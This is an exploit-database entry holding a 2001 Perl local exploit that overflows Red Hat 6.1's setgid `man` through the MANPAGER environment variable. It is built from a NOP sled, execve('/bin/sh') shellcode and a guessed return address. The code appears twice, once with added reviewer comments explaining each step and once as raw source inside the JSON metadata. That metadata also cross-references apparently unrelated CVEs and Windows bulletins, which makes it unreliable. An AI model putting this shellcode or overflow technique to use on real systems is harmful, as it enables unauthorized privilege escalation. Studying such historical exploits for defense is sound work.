ID 1337DAY-ID-7279
Type zdt
Reporter teleh0r
Modified 2001-01-19T00:00:00
Description
Exploit for the Linux platform, in the local exploits category
======================================
Redhat 6.1 man Local Exploit (egid 15)
======================================
#!/usr/bin/perl
## Redhat 6.1 man exploit - gives egid 15
## Written just for fun - [email protected]
##
## Reviewer notes. This is a 2001-era local stack-smashing proof of concept
## against the `man` binary shipped with Red Hat 6.1. It hands `man` an
## oversized value through the MANPAGER environment variable and, per the
## author's own header, ends up with effective group id 15 (the `man` group
## on Red Hat of that era), so `man` was presumably installed setgid to that
## group. The vulnerable copy inside `man` is not on this page; the buffer
## size and stack address below are the author's guesses for that specific
## build. Nothing is declared with `my` and there is no `use strict` /
## `use warnings`, so $buffer, $i and $address are package globals that
## spring into existence on first use. The whole approach assumes a fixed,
## executable stack: stack canaries, NX and stack address randomization
## each defeat it, and environment-driven overflows in setgid programs are
## the classic reason privileged binaries sanitize their environment and
## modern `man` implementations drop their group privilege early.

# Hand-assembled x86 Linux payload. Visible in the bytes are the ASCII
# string "/bin/sh" (\x2f\x62\x69\x6e\x2f\x73\x68), `mov al, 0x0b` (\xb0\x0b,
# the execve syscall number) and `int 0x80` (\xcd\x80); the bytes before
# them appear to be a small stub that sets up that call without containing
# any NUL byte, so the payload survives being passed as an environment string.
$shellcode = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
"\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01";
# Total length of the MANPAGER value built below; chosen by the author so
# that the copy inside `man` runs past the saved return address (EIP).
$len = 4062; # -- Sufficient to overwrite EIP.
$nop = "\x90"; # -- x86 NOP.
# Hard-coded guess of where the buffer lands on the stack. Only meaningful
# on a kernel without stack randomization; elsewhere it is just a bad pointer.
$ret = 0xbfffbb24; # -- ESP / Return value.
$offset = -800; # -- Default offset to try.
# An optional single argument overrides the offset. It is used unvalidated in
# the arithmetic below; a non-numeric argument silently evaluates as 0.
if (@ARGV == 1) {
$offset = $ARGV[0];
}
# NOP sled: $len minus the shellcode minus 100 bytes reserved for the
# return-address tail. Any landing point inside the sled slides to the payload.
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}
# [ Buffer: NNNNNNNNNNNNNN ]
# Add the shellcode to the buffer.
$buffer .= $shellcode;
# [ Buffer: NNNNNNNNNNNNNNSSSSS ]
# $address is the hex rendering used only for the status line. pack('l')
# yields a signed 32-bit integer in native byte order on every Perl build
# (unlike 'l!'), so on x86 the four bytes come out little-endian -- the
# layout a saved return address has on the stack.
$address = sprintf('%lx', ($ret + $offset));
$new_ret = pack('l', ($ret + $offset));
print("Address: 0x$address / Offset: $offset\n");
# Pause so the printed address/offset can be read before exec replaces us.
sleep(1);
# Fill the rest of the buffer (length 100) with RET's.
# $i resumes from the end of the shellcode ($len - 100), so this appends the
# 4-byte address 25 times, which matches the "length 100" in the comment.
for ($i += length($shellcode); $i < $len; $i += 4) {
$buffer .= $new_ret;
}
# [ Buffer: NNNNNNNNNNNNNNNNSSSSSRRRRRR ]
# `local` on the %ENV element would restore it on scope exit, but exec never
# returns on success, so it is moot here. The single-string exec contains no
# shell metacharacters, so Perl runs /usr/bin/man directly rather than via
# /bin/sh. If exec fails it returns false and the script silently ends --
# nothing checks the return value or reports $!.
local($ENV{'MANPAGER'}) = $buffer; exec("/usr/bin/man id");
{"id": "1337DAY-ID-7279", "lastseen": "2018-03-28T03:24:06", "viewCount": 3, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2018-03-28T03:24:06", "rev": 2}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:85363E24CAB31CC66B298BC023E9CF95", "THREATPOST:D204CF95BB6241F12DBF7CA7342E934C"]}, {"type": "ics", "idList": ["ICSA-19-157-01"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810237", "OPENVAS:1361412562310809833", "OPENVAS:1361412562310813650", "OPENVAS:1361412562310813651"]}, {"type": "cve", "idList": ["CVE-2014-7279"]}, {"type": "mskb", "idList": ["KB3204059", "KB3204062"]}, {"type": "nessus", "idList": ["SMB_NT_MS16-144.NASL", "SMB_NT_MS16-145.NASL"]}, {"type": "kaspersky", "idList": ["KLA10921", "KLA10920", "KLA10924"]}, {"type": "metasploit", "idList": ["MSF:POST/WINDOWS/GATHER/CREDENTIALS/HEIDISQL"]}, {"type": "seebug", "idList": ["SSV:87332"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128911"]}, {"type": "zdt", "idList": ["1337DAY-ID-22808"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9C97E11B989D76D23BA59867D555D277"]}], "modified": "2018-03-28T03:24:06", "rev": 2}, "vulnersScore": 5.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/7279", "description": "Exploit for linux platform in category local exploits", "title": "Redhat 6.1 man Local Exploit (egid 15)", "cvelist": [], "sourceData": "======================================\r\nRedhat 6.1 man Local Exploit (egid 15)\r\n======================================\r\n\r\n\r\n#!/usr/bin/perl\r\n\r\n## Redhat 6.1 man exploit - gives egid 15\r\n## Written just for fun - [email\u00a0protected]\r\n\r\n\r\n$shellcode = \"\\xeb\\x1f\\x5f\\x89\\xfc\\x66\\xf7\\xd4\\x31\\xc0\\x8a\\x07\".\r\n \"\\x47\\x57\\xae\\x75\\xfd\\x88\\x67\\xff\\x48\\x75\\xf6\\x5b\".\r\n \"\\x53\\x50\\x5a\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\xe8\\xdc\\xff\".\r\n 
\"\\xff\\xff\\x01\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x01\";\r\n\r\n\r\n$len = 4062; # -- Sufficient to overwrite EIP.\r\n$nop = \"\\x90\"; # -- x86 NOP.\r\n$ret = 0xbfffbb24; # -- ESP / Return value.\r\n$offset = -800; # -- Default offset to try.\r\n\r\n\r\nif (@ARGV == 1) {\r\n $offset = $ARGV[0];\r\n}\r\n\r\nfor ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {\r\n $buffer .= $nop;\r\n}\r\n\r\n# [ Buffer: NNNNNNNNNNNNNN ]\r\n\r\n# Add the shellcode to the buffer.\r\n\r\n$buffer .= $shellcode;\r\n\r\n# [ Buffer: NNNNNNNNNNNNNNSSSSS ]\r\n\r\n$address = sprintf('%lx', ($ret + $offset));\r\n$new_ret = pack('l', ($ret + $offset));\r\n\r\nprint(\"Address: 0x$address / Offset: $offset\\n\");\r\nsleep(1);\r\n\r\n# Fill the rest of the buffer (length 100) with RET's.\r\n\r\nfor ($i += length($shellcode); $i < $len; $i += 4) {\r\n $buffer .= $new_ret;\r\n}\r\n\r\n# [ Buffer: NNNNNNNNNNNNNNNNSSSSSRRRRRR ]\r\n\r\nlocal($ENV{'MANPAGER'}) = $buffer; exec(\"/usr/bin/man id\");\r\n\r\n\r\n\n# 0day.today [2018-03-28] #", "published": "2001-01-19T00:00:00", "references": [], "reporter": "teleh0r", "modified": "2001-01-19T00:00:00", "href": "https://0day.today/exploit/description/7279"}
{}